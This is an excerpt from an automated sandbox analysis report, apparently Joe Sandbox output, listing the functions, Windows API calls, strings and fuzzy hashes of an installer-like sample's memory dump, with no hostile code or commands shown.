Opcode Fuzzy Hash: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
DeleteObject.GDI32(?), ref: 004045B0
CreateBrushIndirect.GDI32(?), ref: 004045BA

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,00423380,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
lstrlenW.KERNEL32(00403418,0042C248,00000000,00423380,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 0040657A: lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
Opcode Fuzzy Hash: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

Uniqueness

Uniqueness Score: -1.00%

Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

Strings

*?|<>/":, xrefs: 00406816
C:\Users\user\AppData\Local\Temp\, xrefs: 004067C5

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4010320282
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
GetMessagePos.USER32 ref: 00404E77
ScreenToClient.USER32(?,?), ref: 00404E91
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9

Strings

f, xrefs: 00404EA5

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(0000C800,00000064,000EABB0), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000000.00000002.1772365130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1772348037.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772383284.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772399331.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1772490301.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J2NWKU2oJi.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

